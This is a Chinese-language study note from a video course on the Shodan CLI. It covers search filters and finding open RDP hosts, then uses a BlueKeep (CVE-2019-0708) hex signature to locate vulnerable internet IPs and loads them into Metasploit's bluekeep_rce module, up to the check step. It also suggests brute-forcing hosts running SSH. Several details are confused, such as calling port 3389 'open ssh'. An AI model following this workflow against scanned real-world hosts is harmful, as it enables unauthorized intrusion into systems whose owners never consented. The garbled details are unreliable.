声明:学习视频来自b站up主 泷羽sec,如涉及侵权马上删除文章
感谢泷羽sec 团队的教学
视频地址:shodan(2)_哔哩哔哩_bilibili
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负
一、search
1.shodan search --color --limit 10 --fields ip_str port: 3389
country:cn city:shenzhen ( 泷哥)
shodan search --color --limit 10 --fields ip_str post: 3389
country:cn city:shenzhen(错的)
1>在Shodan搜索中,port 和 post 是两个完全不同的字段。port 字段用于指定你想要搜索的端口号,而 post 并不是 Shodan 搜索中有效的字段名。
对于你的两个命令:
-
shodan search --color --limit 10 --fields ip_str port: 3389 country:cn city:shenzhen这个命令的意图是搜索位于中国深圳,开放了3389端口的设备。这里的port: 3389指定了端口号为3389,通常这个端口用于远程桌面协议(RDP)。 -
shodan search --color --limit 10 --fields ip_str post: 3389 country:cn city:shenzhen这个命令中使用了post: 3389,但由于post不是有效的字段名,所以这个命令实际上不会返回任何包含端口信息的结果。如果你想搜索端口信息,应该使用port:而不是post:。
总结来说,第一个命令是正确的,可以返回位于深圳的开放3389端口的IP地址,而第二个命令因为字段名错误,不会返回期望的端口信息。正确的命令应该使用 port: 字段名来指定端口号。
参数说明: --color >> 重点内容标红;
country:cn city:shenzhen 输入cn什么的大小写无所谓
制定国家为中国,城市为深圳 ————————————————
由于3389端口是 远程桌面 协议的默认端口,因此它容易成为黑客攻击的目标。未经授权的攻击者可能利用漏洞或弱密码等手段,通过3389端口入侵系统,窃取敏感信息或执行恶意操作。
2.shodan search --limit 10 --fields ip_str port :80 country:jp
参数说明: port 80 >> 指定搜索80端口的IP地址
3.shodan search --limit 10 --fields ip country:jp
出来的是数字ip
--fields:指定筛选获取的目标信息
4.shodan search --limit 10 country:jp
参数说明: --limit >> 显示信息数量; country >> 指定搜索国家
二、host
shodan host ip(查看ip信息)
参数说明: host >>查询ip信息
返回的信息包括所在国家、组织、最后更新时间、开放端口数、可能存在的漏洞CVE、端口运行情况等。
5、shodan的语法(kali Linux) (1)-h:显示帮助文档,帮助输入命令的正确性
(2)search 搜索功能
(3)host 显示目标的相关信息
(4)--limit 限制搜索目标的数量
(5)--fields 指定筛选获取的目标信息,如IP,port等(ip_str表示将IP地址规范为IPv4的形式)
(6)country:指定筛选目标的地区,CN代表中国,JP代表日本,KR指定韩国。
(7)--color:表示颜色加深
(8)os:表示筛选操作系统windows........
(9)device:表示指定设备,如摄像头(webcam),路由器(router),web端的一 些设备(tp-link)
device:webcam device:rou
(10)has_vuln:Ture :表示筛选存在漏洞的目标IP
这些排列顺序好像无所谓
3389/tcp open ssh 因为有open ssh就可以做一个爆破
访问ip直接在上面粘贴
三、寻找漏洞
我们可以使用漏洞的漏洞特征来寻找漏洞,比如:shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"' 后面这字符串就是cve-2019-0708的十六进制漏洞特征,我们可以在shodan中找到有该漏洞的ip,但是有漏洞不代表能利用。
可以自己搜索漏洞特征
0.先把扫出来的ip放入一个文件,然后将文件的端口删除,再移动到kali上
1.在命令行输入msfconsole 回车
2.首先先搜索相关的利用漏洞,输入search cve-2019-0708,发现可以利用的漏洞exp(cve-2019-0708是个漏洞名) 回车
3.利用exp,输入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce(复制),进入到利用脚本 回车
4.输入show options 回车
5.set rhosts file: 拖入文件 回车
6.输入check
1201

被折叠的 条评论
为什么被折叠?



